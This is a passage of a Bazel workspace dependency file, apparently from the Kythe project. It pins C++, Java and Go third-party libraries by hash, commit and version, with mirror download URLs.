"command_line.proto": "a6fb6591aa50794431787169bc4fae16105ef5c401e7c30ecf0f775e0ab25c2c",
"invocation_policy.proto": "5312a440a5d16e9bd72cd8561ad2f5d2b29579f19df7e13af1517c6ad9e7fa64",
"option_filters.proto": "e3e8dfa9a4e05683bf1853a0be29fae46c753b18ad3d42b92bedcb412577f20f",
},
)
def _cc_dependencies():
maybe(
http_archive,
name = "net_zlib",
build_file = "@io_kythe//third_party:zlib.BUILD",
sha256 = "c3e5e9fdd5004dcb542feda5ee4f0ff0744628baf8ed2dd5d66f8ca1197cb1a1",
strip_prefix = "zlib-1.2.11",
urls = [
"https://mirror.bazel.build/zlib.net/zlib-1.2.11.tar.gz",
"https://zlib.net/zlib-1.2.11.tar.gz",
],
)
maybe(
http_archive,
name = "org_libzip",
build_file = "@io_kythe//third_party:libzip.BUILD",
sha256 = "a5d22f0c87a2625450eaa5e10db18b8ee4ef17042102d04c62e311993a2ba363",
strip_prefix = "libzip-rel-1-5-1",
urls = [
# Bazel does not like the official download link at libzip.org,
# so use the GitHub release tag.
"https://mirror.bazel.build/github.com/nih-at/libzip/archive/rel-1-5-1.zip",
"https://github.com/nih-at/libzip/archive/rel-1-5-1.zip",
],
)
maybe(
git_repository,
name = "boringssl",
# Use the github mirror because the official source at
# https://boringssl.googlesource.com/boringssl does not allow
# unauthenticated git clone and the archives suffer from
# https://github.com/google/gitiles/issues/84 preventing the use of
# sha256sum on archives.
remote = "https://github.com/google/boringssl",
# Commits must come from the master-with-bazel branch.
# branch = "master-with-bazel",
commit = "e0c35d6c06fd800de1092f0b4d4326570ca2617a",
shallow_since = "1566966435 +0000",
)
maybe(
http_archive,
name = "com_github_tencent_rapidjson",
build_file = "@io_kythe//third_party:rapidjson.BUILD",
sha256 = "8e00c38829d6785a2dfb951bb87c6974fa07dfe488aa5b25deec4b8bc0f6a3ab",
strip_prefix = "rapidjson-1.1.0",
urls = [
"https://mirror.bazel.build/github.com/Tencent/rapidjson/archive/v1.1.0.zip",
"https://github.com/Tencent/rapidjson/archive/v1.1.0.zip",
],
)
# Make sure to update regularly in accordance with Abseil's principle of live at HEAD
maybe(
github_archive,
name = "com_google_absl",
repo_name = "abseil/abseil-cpp",
commit = "0033c9ea91a52ade7c6b725aa2ef3cbe15463421",
sha256 = "a245e059514f2e3bd0bd6ca455b6a66e34656b1b447fec3dc98419153af23b14",
)
maybe(
github_archive,
name = "com_google_googletest",
repo_name = "google/googletest",
sha256 = "4a4cbf4bb09606f42a0cdd6f0893fbf1e257243fda64bc5b585d027808a3a64b",
commit = "61f010d703b32de9bfb20ab90ece38ab2f25977f",
)
maybe(
http_archive,
name = "com_github_google_glog",
strip_prefix = "glog-ba8a9f6952d04d1403b97df24e6836227751454e",
sha256 = "9b4867ab66c33c41e2672b5de7e3133d38411cdb75eeb0d2b72c88bb10375c71",
urls = [
"https://mirror.bazel.build/github.com/google/glog/archive/ba8a9f6952d04d1403b97df24e6836227751454e.zip",
"https://github.com/google/glog/archive/ba8a9f6952d04d1403b97df24e6836227751454e.zip",
],
build_file_content = "\n".join([
"load(\"//:bazel/glog.bzl\", \"glog_library\")",
"glog_library(with_gflags=0)",
]),
)
maybe(
http_archive,
name = "org_brotli",
sha256 = "4c61bfb0faca87219ea587326c467b95acb25555b53d1a421ffa3c8a9296ee2c",
strip_prefix = "brotli-1.0.7",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party:brotli/brotli-1.0.7-int-float-conversion.patch",
],
urls = [
"https://mirror.bazel.build/github.com/google/brotli/archive/v1.0.7.tar.gz",
"https://github.com/google/brotli/archive/v1.0.7.tar.gz",
],
)
maybe(
http_archive,
name = "com_google_riegeli",
sha256 = "762b838bcf3ddc02e1b334103ef21f02316e57be373444ff7c7461781935c8b6",
strip_prefix = "riegeli-a624e7f8e98aff394904685ecbba2e5ee664606a",
urls = [
"https://mirror.bazel.build/github.com/google/riegeli/archive/a624e7f8e98aff394904685ecbba2e5ee664606a.zip",
"https://github.com/google/riegeli/archive/a624e7f8e98aff394904685ecbba2e5ee664606a.zip",
],
)
maybe(
http_archive,
name = "org_libmemcached_libmemcached",
build_file = "@io_kythe//third_party:libmemcached.BUILD",
sha256 = "e22c0bb032fde08f53de9ffbc5a128233041d9f33b5de022c0978a2149885f82",
strip_prefix = "libmemcached-1.0.18",
urls = [
"https://mirror.bazel.build/launchpad.net/libmemcached/1.0/1.0.18/+download/libmemcached-1.0.18.tar.gz",
"https://launchpad.net/libmemcached/1.0/1.0.18/+download/libmemcached-1.0.18.tar.gz",
],
)
maybe(
http_archive,
name = "se_haxx_curl",
build_file = "@io_kythe//third_party:curl.BUILD",
sha256 = "ff3e80c1ca6a068428726cd7dd19037a47cc538ce58ef61c59587191039b2ca6",
strip_prefix = "curl-7.49.1",
urls = [
"https://mirror.bazel.build/curl.haxx.se/download/curl-7.49.1.tar.gz",
"https://curl.haxx.se/download/curl-7.49.1.tar.gz",
],
)
maybe(
http_archive,
name = "com_googlesource_code_re2",
sha256 = "ae9b962dbd6427565efd3e9503acb40a1385b21962c29050546c9347ac7fa93f",
strip_prefix = "re2-2019-01-01",
urls = [
"https://mirror.bazel.build/github.com/google/re2/archive/2019-01-01.zip",
"https://github.com/google/re2/archive/2019-01-01.zip",
],
)
maybe(
http_archive,
name = "com_github_stedolan_jq",
build_file = "@io_kythe//third_party:jq.BUILD",
sha256 = "998c41babeb57b4304e65b4eb73094279b3ab1e63801b6b4bddd487ce009b39d",
strip_prefix = "jq-1.4",
urls = [
"https://mirror.bazel.build/github.com/stedolan/jq/releases/download/jq-1.4/jq-1.4.tar.gz",
"https://github.com/stedolan/jq/releases/download/jq-1.4/jq-1.4.tar.gz",
],
)
maybe(
http_archive,
name = "com_github_google_snappy",
build_file = "@io_kythe//third_party:snappy.BUILD",
sha256 = "61e05a0295fd849072668b1f3494801237d809427cfe8fd014cda455036c3ef7",
strip_prefix = "snappy-1.1.7",
urls = [
"https://mirror.bazel.build/github.com/google/snappy/archive/1.1.7.zip",
"https://github.com/google/snappy/archive/1.1.7.zip",
],
)
maybe(
http_archive,
name = "com_github_google_leveldb",
build_file = "@io_kythe//third_party:leveldb.BUILD",
sha256 = "5b2bd7a91489095ad54bb81ca6544561025b48ec6d19cc955325f96755d88414",
strip_prefix = "leveldb-1.20",
urls = [
"https://mirror.bazel.build/github.com/google/leveldb/archive/v1.20.zip",
"https://github.com/google/leveldb/archive/v1.20.zip",
],
)
maybe(
git_llvm_repository,
name = "org_llvm",
)
lexyacc_configure()
cxx_extractor_register_toolchains()
def _java_dependencies():
maybe(
# For @com_google_common_flogger
http_archive,
name = "google_bazel_common",
strip_prefix = "bazel-common-b3778739a9c67eaefe0725389f03cf821392ac67",
sha256 = "4ae0fd0af627be9523a166b88d1298375335f418dcc13a82e9e77a0089a4d254",
urls = [
"https://mirror.bazel.build/github.com/google/bazel-common/archive/b3778739a9c67eaefe0725389f03cf821392ac67.zip",
"https://github.com/google/bazel-common/archive/b3778739a9c67eaefe0725389f03cf821392ac67.zip",
],
)
maybe(
git_repository,
name = "com_google_common_flogger",
commit = "ca8ad22bc1479b5675118308f88ef3fff7d26c1f",
remote = "https://github.com/google/flogger",
)
maven_install(
name = "maven",
artifacts = [
"com.beust:jcommander:1.48",
"com.google.auto.service:auto-service:1.0-rc4",
"com.google.auto.value:auto-value:1.5.4",
"com.google.auto:auto-common:0.10",
"com.google.code.findbugs:jsr305:3.0.1",
"com.google.code.gson:gson:2.8.5",
"com.google.common.html.types:types:1.0.8",
"com.google.errorprone:error_prone_annotations:2.3.1",
"com.google.guava:guava:26.0-jre",
"com.google.jimfs:jimfs:1.1",
"com.google.re2j:re2j:1.2",
"com.google.truth:truth:1.0",
"com.googlecode.java-diff-utils:diffutils:1.3.0",
"org.apache.tomcat:tomcat-annotations-api:9.0.34",
"junit:junit:4.12",
"org.checkerframework:checker-qual:2.9.0",
"org.ow2.asm:asm:7.0",
],
repositories = [
"https://jcenter.bintray.com",
"https://maven.google.com",
"https://repo1.maven.org/maven2",
],
fetch_sources = True,
generate_compat_repositories = True, # Required by bazel-common's dependencies
version_conflict_policy = "pinned",
)
def _go_dependencies():
go_repository(
name = "com_github_golang_protobuf",
build_file_proto_mode = "disable_global",
importpath = "github.com/golang/protobuf",
patch_args = ["-p1"],
patches = [
"@io_bazel_rules_go//third_party:com_github_golang_protobuf-extras.patch",
"@io_kythe//third_party/go:new_export_license.patch",
],
sum = "h1:ZFgWrT+bLgsYPirOnRfKLYJLvssAegOj/hgyMFdJZe0=",
version = "v1.4.1",
)
go_repository(
name = "com_github_google_uuid",
importpath = "github.com/google/uuid",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:Gkbcsh/GbpXz7lPftLA3P6TYMwjCLYm83jiFQZF/3gY=",
version = "v1.1.1",
)
go_repository(
name = "com_github_jmhodges_levigo",
importpath = "github.com/jmhodges/levigo",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:levigo.patch",
],
sum = "h1:q5EC36kV79HWeTBWsod3mG11EgStG3qArTKcvlksN1U=",
version = "v1.0.0",
)
go_repository(
name = "com_github_google_go_cmp",
importpath = "github.com/google/go-cmp",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4=",
version = "v0.4.0",
)
go_repository(
name = "org_golang_x_sync",
importpath = "golang.org/x/sync",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:vcxGaoTs7kV8m5Np9uUNQin4BrLOthgV7252N8V+FwY=",
version = "v0.0.0-20190911185100-cd5d95a43a6e",
)
go_repository(
name = "com_github_sourcegraph_jsonrpc2",
importpath = "github.com/sourcegraph/jsonrpc2",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:5VGNYxMxzZ8Jb2bARgVl1DNg8vpcd9S8b4MbbjWQ8/w=",
version = "v0.0.0-20191222043438-96c4efab7ee2",
)
go_repository(
name = "com_github_hanwen_go_fuse",
importpath = "github.com/hanwen/go-fuse",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:GxS9Zrn6c35/BnfiVsZVWmsG803xwE7eVRDvcf/BEVc=",
version = "v1.0.0",
)
go_repository(
name = "com_github_golang_snappy",
importpath = "github.com/golang/snappy",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:Qgr9rKW7uDUkrbSmQeiDsGa8SjGyCOGtuasMWwvp2P4=",
version = "v0.0.1",
)
go_repository(
name = "com_github_sourcegraph_go_langserver",
importpath = "github.com/sourcegraph/go-langserver",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:lj2sRU7ZMIkW372IDVGb6fE8VAY4c/EMsiDzrB9vmiU=",
version = "v2.0.0+incompatible",
)
go_repository(
name = "com_github_sergi_go_diff",
importpath = "github.com/sergi/go-diff",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:we8PVUC3FE2uYfodKH/nBHMSetSfHDR6scGdBi+erh0=",
version = "v1.1.0",
)
go_repository(
name = "com_github_google_subcommands",
importpath = "github.com/google/subcommands",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:vWQspBTo2nEqTUFita5/KeEWlUL8kQObDFbub/EN9oE=",
version = "v1.2.0",
)
http_archive(
name = "org_golang_x_tools",
urls = [
"https://mirror.bazel.build/github.com/golang/tools/archive/2bc93b1c0c88b2406b967fcd19a623d1ff9ea0cd.zip",
"https://github.com/golang/tools/archive/2bc93b1c0c88b2406b967fcd19a623d1ff9ea0cd.zip",
],
sha256 = "b05c5b5b9091a35ecb433227ea30aa75cb6b9d9409b308bc75d0975d4a291912",
strip_prefix = "tools-2bc93b1c0c88b2406b967fcd19a623d1ff9ea0cd",
patches = [
# deletegopls removes the gopls subdirectory. It contains a nested
# module with additional dependencies. It's not needed by rules_go.
"@io_bazel_rules_go//third_party:org_golang_x_tools-deletegopls.patch",
# gazelle args: -repo_root . -go_prefix golang.org/x/tools
"@io_bazel_rules_go//third_party:org_golang_x_tools-gazelle.patch",
# extras adds go_tool_library rules for packages under
# go/analysis/passes and their dependencies. These are needed by
# nogo.
"@io_bazel_rules_go//third_party:org_golang_x_tools-extras.patch",
"@io_kythe//third_party/go:add_export_license.patch",
],
patch_args = ["-p1"],
)
go_repository(
name = "org_golang_x_text",
importpath = "golang.org/x/text",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:tW2bmiBqwgJj/UpqtC8EpXEZVYOwU0yG4iWbprSVAcs=",
version = "v0.3.2",
)
go_repository(
name = "org_golang_x_net",
importpath = "golang.org/x/net",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:GuSPYbZzB5/dcLNCwLQLsg3obCJtX9IJhpXkvY7kzk0=",
version = "v0.0.0-20200301022130-244492dfa37a",
)
go_repository(
name = "com_github_pkg_errors",
importpath = "github.com/pkg/errors",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=",
version = "v0.9.1",
)
go_repository(
name = "org_bitbucket_creachadair_stringset",
importpath = "bitbucket.org/creachadair/stringset",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:gQqe4vs8XWgMyijfyKE6K8o4TcyGGrRXe0JvHgx5H+M=",
version = "v0.0.8",
)
go_repository(
name = "org_bitbucket_creachadair_shell",
importpath = "bitbucket.org/creachadair/shell",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:reJflDbKqnlnqb4Oo2pQ1/BqmY/eCWcNGHrIUO8qIzc=",
version = "v0.0.6",
)
go_repository(
name = "org_golang_google_grpc",
importpath = "google.golang.org/grpc",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:bO/TA4OxCOummhSf10siHuG7vJOiwh7SpRpFZDkOgl4=",
version = "v1.28.0",
)
go_repository(
name = "org_golang_x_oauth2",
importpath = "golang.org/x/oauth2",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:TzXSXBo42m9gQenoE3b9BGiEpg5IG2JkU5FkPIawgtw=",
version = "v0.0.0-20200107190931-bf48bf16ab8d",
)
go_repository(
name = "com_github_apache_beam",
build_file_proto_mode = "disable",
importpath = "github.com/apache/beam",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:Dm4cSxkGeH8l9OG2jkOodp2Dg6uZjorV0XU8vDy/fa4=",
version = "v2.19.0+incompatible",
)
go_repository(
name = "org_golang_google_api",
importpath = "google.golang.org/api",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:jz2KixHX7EcCPiQrySzPdnYT7DbINAypCqKZ1Z7GM40=",
version = "v0.20.0",
)
go_repository(
name = "com_google_cloud_go",
importpath = "cloud.google.com/go",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:3ithwDMr7/3vpAMXiH+ZQnYbuIsh+OPhUPMFC9enmn0=",
version = "v0.54.0",
)
go_repository(
name = "io_opencensus_go",
importpath = "go.opencensus.io",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:8sGtKOrtQqkN1bp2AtX+misvLIlOmsEsNd+9NIcPEm8=",
version = "v0.22.3",
)
go_repository(
name = "com_github_syndtr_goleveldb",
importpath = "github.com/syndtr/goleveldb",
sum = "h1:fBdIW9lB4Iz0n9khmH8w27SJ3QEJ7+IgjPEwGSZiFdE=",
version = "v1.0.0",
)
go_repository(
name = "com_github_minio_highwayhash",
importpath = "github.com/minio/highwayhash",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:iMSDhgUILCr0TNm8LWlSjF8N0ZIj2qbO8WHp6Q/J2BA=",
version = "v1.0.0",
)
go_repository(
name = "org_golang_x_sys",
importpath = "golang.org/x/sys",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:uYVVQ9WP/Ds2ROhcaGPeIdVq0RIXVLwsHlnvJ+cT1So=",
version = "v0.0.0-20200302150141-5c8b2ff67527",
)
go_repository(
name = "com_github_datadog_zstd",
importpath = "github.com/DataDog/zstd",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:+IawcoXhCBylN7ccwdwf8LOH2jKq7NavGpEPanrlTzE=",
version = "v1.4.4",
)
go_repository(
name = "com_github_beevik_etree",
importpath = "github.com/beevik/etree",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:T0xke/WvNtMoCqgzPhkX2r4rjY3GDZFi+FjpRZY2Jbs=",
version = "v1.1.0",
)
go_repository(
name = "com_github_google_orderedcode",
importpath = "github.com/google/orderedcode",
sum = "h1:UzfcAexk9Vhv8+9pNOgRu41f16lHq725vPwnSeiG/Us=",
version = "v0.0.1",
)
go_repository(
name = "io_k8s_sigs_yaml",
importpath = "sigs.k8s.io/yaml",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:kr/MCeFWJWTwyaHoR9c8EjH9OumOmoF9YGiZd7lFm/Q=",
version = "v1.2.0",
)
go_repository(
name = "in_gopkg_yaml_v2",
importpath = "gopkg.in/yaml.v2",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:obN1ZagJSUGI0Ek/LBmuj4SNLPfIny3KsKFopxRdj10=",
version = "v2.2.8",
)
go_repository(
name = "com_github_mholt_archiver",
importpath = "github.com/mholt/archiver",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:1dCVxuqs0dJseYEhi5pl7MYPH9zDa1wBi7mF09cbNkU=",
version = "v3.1.1+incompatible",
)
go_repository(
name = "com_github_dsnet_compress",
importpath = "github.com/dsnet/compress",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:PlZu0n3Tuv04TzpfPbrnI0HW/YwodEXDS+oPKahKF0Q=",
version = "v0.0.1",
)
go_repository(
name = "com_github_nwaples_rardecode",
importpath = "github.com/nwaples/rardecode",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:vSxaY8vQhOcVr4mm5e8XllHWTiM4JF507A0Katqw7MQ=",
version = "v1.1.0",
)
go_repository(
name = "com_github_pierrec_lz4",
importpath = "github.com/pierrec/lz4",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:mFe7ttWaflA46Mhqh+jUfjp2qTbPYxLB2/OyBppH9dg=",
version = "v2.4.1+incompatible",
)
go_repository(
name = "com_github_ulikunitz_xz",
importpath = "github.com/ulikunitz/xz",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:YvTNdFzX6+W5m9msiYg/zpkSURPPtOlzbqYjrFn7Yt4=",
version = "v0.5.7",
)
go_repository(
name = "com_github_xi2_xz",
importpath = "github.com/xi2/xz",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:nIPpBwaJSVYIxUFsDv3M8ofmx9yWTog9BfvIu0q41lo=",
version = "v0.0.0-20171230120015-48954b6210f8",
)
maybe(
http_archive,
name = "org_brotli_go",
sha256 = "4c61bfb0faca87219ea587326c467b95acb25555b53d1a421ffa3c8a9296ee2c",
strip_prefix = "brotli-1.0.7/go",
urls = [
"https://mirror.bazel.build/github.com/google/brotli/archive/v1.0.7.tar.gz",
"https://github.com/google/brotli/archive/v1.0.7.tar.gz",
],
)
_gazelle_ignore(
name = "com_github_bazelbuild_rules_go",
actual = "io_bazel_rules_go",
importpath = "github.com/bazelbuild/rules_go",
)
_gazelle_ignore(
name = "com_github_google_brotli",
actual = "org_brotli_go",
importpath = "github.com/google/brotli",
)
go_repository(
name = "co_honnef_go_tools",
importpath = "honnef.co/go/tools",
sum = "h1:sXmLre5bzIR6ypkjXCDI3jHPssRhc8KD/Ome589sc3U=",
version = "v0.0.1-2020.1.3",
)
go_repository(
name = "com_github_burntsushi_toml",
importpath = "github.com/BurntSushi/toml",
sum = "h1:WXkYYl6Yr3qBf1K79EBnL4mak0OimBfB0XUf9Vl28OQ=",
version = "v0.3.1",
)
go_repository(
name = "com_github_burntsushi_xgb",
importpath = "github.com/BurntSushi/xgb",
sum = "h1:1BDTz0u9nC3//pOCMdNH+CiXJVYJh5UQNCOBG7jbELc=",
version = "v0.0.0-20160522181843-27f122750802",
)
go_repository(
name = "com_github_census_instrumentation_opencensus_proto",
importpath = "github.com/census-instrumentation/opencensus-proto",
sum = "h1:glEXhBS5PSLLv4IXzLA5yPRVX4bilULVyxxbrfOtDAk=",
version = "v0.2.1",
)
go_repository(
name = "com_github_client9_misspell",
importpath = "github.com/client9/misspell",
sum = "h1:ta993UF76GwbvJcIo3Y68y/M3WxlpEHPWIGDkJYwzJI=",
version = "v0.3.4",
)
go_repository(
name = "com_github_creachadair_staticfile",
importpath = "github.com/creachadair/staticfile",
sum = "h1:QG0u27/Ietu0UVOk1aMbF6jrWrEzPIdZP4ju3c1PPfY=",
version = "v0.1.2",
)
go_repository(
name = "com_github_davecgh_go_spew",
importpath = "github.com/davecgh/go-spew",
sum = "h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=",
version = "v1.1.1",
)
go_repository(
name = "com_github_dsnet_golib",
importpath = "github.com/dsnet/golib",
sum = "h1:tFh1tRc4CA31yP6qDcu+Trax5wW5GuMxvkIba07qVLY=",
version = "v0.0.0-20171103203638-1ea166775780",
)
go_repository(
name = "com_github_envoyproxy_go_control_plane",
importpath = "github.com/envoyproxy/go-control-plane",
sum = "h1:rEvIZUSZ3fx39WIi3JkQqQBitGwpELBIYWeBVh6wn+E=",
version = "v0.9.4",
)
go_repository(
name = "com_github_envoyproxy_protoc_gen_validate",
importpath = "github.com/envoyproxy/protoc-gen-validate",
sum = "h1:EQciDnbrYxy13PgWoY8AqoxGiPrpgBZ1R8UNe3ddc+A=",
version = "v0.1.0",
)
go_repository(
name = "com_github_fsnotify_fsnotify",
importpath = "github.com/fsnotify/fsnotify",
sum = "h1:IXs+QLmnXW2CcXuY+8Mzv/fWEsPGWxqefPtCP5CnV9I=",
version = "v1.4.7",
)
go_repository(
name = "com_github_go_gl_glfw",
importpath = "github.com/go-gl/glfw",
sum = "h1:QbL/5oDUmRBzO9/Z7Seo6zf912W/a6Sr4Eu0G/3Jho0=",
version = "v0.0.0-20190409004039-e6da0acd62b1",
)
go_repository(
name = "com_github_go_gl_glfw_v3_3_glfw",
importpath = "github.com/go-gl/glfw/v3.3/glfw",
sum = "h1:WtGNWLvXpe6ZudgnXrq0barxBImvnnJoMEhXAzcbM0I=",
version = "v0.0.0-20200222043503-6f7a984d4dc4",
)
go_repository(
name = "com_github_golang_glog",
importpath = "github.com/golang/glog",
sum = "h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58=",
version = "v0.0.0-20160126235308-23def4e6c14b",
)
go_repository(
name = "com_github_golang_groupcache",
importpath = "github.com/golang/groupcache",
sum = "h1:1r7pUrabqp18hOBcwBwiTsbnFeTZHV9eER/QT5JVZxY=",
version = "v0.0.0-20200121045136-8c9f03a8e57e",
)
go_repository(
name = "com_github_golang_mock",
importpath = "github.com/golang/mock",
sum = "h1:ocYkMQY5RrXTYgXl7ICpV0IXwlEQGwKIsery4gyXa1U=",
version = "v1.4.1",
)
go_repository(
name = "com_github_google_btree",
importpath = "github.com/google/btree",
sum = "h1:0udJVsspx3VBr5FwtLhQQtuAsVc79tTq0ocGIPAU6qo=",
version = "v1.0.0",
)
go_repository(
name = "com_github_google_martian",
importpath = "github.com/google/martian",
sum = "h1:/CP5g8u/VJHijgedC/Legn3BAbAaWPgecwXBIDzw5no=",
version = "v2.1.0+incompatible",
)
go_repository(
name = "com_github_google_pprof",
importpath = "github.com/google/pprof",
sum = "h1:SRgJV+IoxM5MKyFdlSUeNy6/ycRUF2yBAKdAQswoHUk=",
version = "v0.0.0-20200229191704-1ebb73c60ed3",
)
go_repository(
name = "com_github_google_renameio",
importpath = "github.com/google/renameio",
sum = "h1:GOZbcHa3HfsPKPlmyPyN2KEohoMXOhdMbHrvbpl2QaA=",
version = "v0.1.0",
)
go_repository(
name = "com_github_googleapis_gax_go_v2",
build_file_proto_mode = "disable",
importpath = "github.com/googleapis/gax-go/v2",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:sjZBwGj9Jlw33ImPtvFviGYvseOtDM7hkSKB7+Tv3SM=",
version = "v2.0.5",
)
go_repository(
name = "com_github_gorilla_websocket",
importpath = "github.com/gorilla/websocket",
sum = "h1:q7AeDBpnBk8AogcD4DSag/Ukw/KV+YhzLj2bP5HvKCM=",
version = "v1.4.1",
)
go_repository(
name = "com_github_hashicorp_golang_lru",
importpath = "github.com/hashicorp/golang-lru",
sum = "h1:0hERBMJE1eitiLkihrMvRVBYAkpHzc/J3QdDN+dAcgU=",
version = "v0.5.1",
)
go_repository(
name = "com_github_hpcloud_tail",
importpath = "github.com/hpcloud/tail",
sum = "h1:nfCOvKYfkgYP8hkirhJocXT2+zOD8yUNjXaWfTlyFKI=",
version = "v1.0.0",
)
go_repository(
name = "com_github_jstemmer_go_junit_report",
importpath = "github.com/jstemmer/go-junit-report",
sum = "h1:6QPYqodiu3GuPL+7mfx+NwDdp2eTkp9IfEUpgAwUN0o=",
version = "v0.9.1",
)
go_repository(
name = "com_github_kisielk_gotool",
importpath = "github.com/kisielk/gotool",
sum = "h1:AV2c/EiW3KqPNT9ZKl07ehoAGi4C5/01Cfbblndcapg=",
version = "v1.0.0",
)
go_repository(
name = "com_github_klauspost_compress",
importpath = "github.com/klauspost/compress",
sum = "h1:8VMb5+0wMgdBykOV96DwNwKFQ+WTI4pzYURP99CcB9E=",
version = "v1.4.1",
)
go_repository(
name = "com_github_klauspost_cpuid",
importpath = "github.com/klauspost/cpuid",
sum = "h1:NMpwD2G9JSFOE1/TJjGSo5zG7Yb2bTe7eq1jH+irmeE=",
version = "v1.2.0",
)
go_repository(
name = "com_github_kr_pretty",
importpath = "github.com/kr/pretty",
sum = "h1:L/CwN0zerZDmRFUapSPitk6f+Q3+0za1rQkzVuMiMFI=",
version = "v0.1.0",
)
go_repository(
name = "com_github_kr_pty",
importpath = "github.com/kr/pty",
sum = "h1:VkoXIwSboBpnk99O/KFauAEILuNHv5DVFKZMBN/gUgw=",
version = "v1.1.1",
)
go_repository(
name = "com_github_kr_text",
importpath = "github.com/kr/text",
sum = "h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE=",
version = "v0.1.0",
)
go_repository(
name = "com_github_onsi_ginkgo",
importpath = "github.com/onsi/ginkgo",
sum = "h1:VkHVNpR4iVnU8XQR6DBm8BqYjN7CRzw+xKUbVVbbW9w=",
version = "v1.8.0",
)
go_repository(
name = "com_github_onsi_gomega",
importpath = "github.com/onsi/gomega",
sum = "h1:izbySO9zDPmjJ8rDjLvkA2zJHIo+HkYXHnf7eN7SSyo=",
version = "v1.5.0",
)
go_repository(
name = "com_github_pmezard_go_difflib",
importpath = "github.com/pmezard/go-difflib",
sum = "h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=",
version = "v1.0.0",
)
go_repository(
name = "com_github_prometheus_client_model",
importpath = "github.com/prometheus/client_model",
sum = "h1:gQz4mCbXsO+nc9n1hCxHcGA3Zx3Eo+UHZoInFGUIXNM=",
version = "v0.0.0-20190812154241-14fe0d1b01d4",
)
go_repository(
name = "com_github_rogpeppe_go_internal",
importpath = "github.com/rogpeppe/go-internal",
sum = "h1:RR9dF3JtopPvtkroDZuVD7qquD0bnHlKSqaQhgwt8yk=",
version = "v1.3.0",
)
go_repository(
name = "com_github_stretchr_objx",
importpath = "github.com/stretchr/objx",
sum = "h1:4G4v2dO3VZwixGIRoQ5Lfboy6nUhCyYzaqnIAPPhYs4=",
version = "v0.1.0",
)
go_repository(
name = "com_github_stretchr_testify",
importpath = "github.com/stretchr/testify",
sum = "h1:2E4SXV/wtOkTonXsotYi4li6zVWxYlZuYNCXe9XRJyk=",
version = "v1.4.0",
)
go_repository(
name = "com_google_cloud_go_bigquery",
importpath = "cloud.google.com/go/bigquery",
sum = "h1:xE3CPsOgttP4ACBePh79zTKALtXwn/Edhcr16R5hMWU=",
version = "v1.4.0",
)
go_repository(
name = "com_google_cloud_go_datastore",
importpath = "cloud.google.com/go/datastore",
sum = "h1:/May9ojXjRkPBNVrq+oWLqmWCkr4OU5uRY29bu0mRyQ=",
version = "v1.1.0",
)
go_repository(
name = "com_google_cloud_go_pubsub",
importpath = "cloud.google.com/go/pubsub",
sum = "h1:Lpy6hKgdcl7a3WGSfJIFmxmcdjSpP6OmBEfcOv1Y680=",
version = "v1.2.0",
)
go_repository(
name = "com_google_cloud_go_storage",
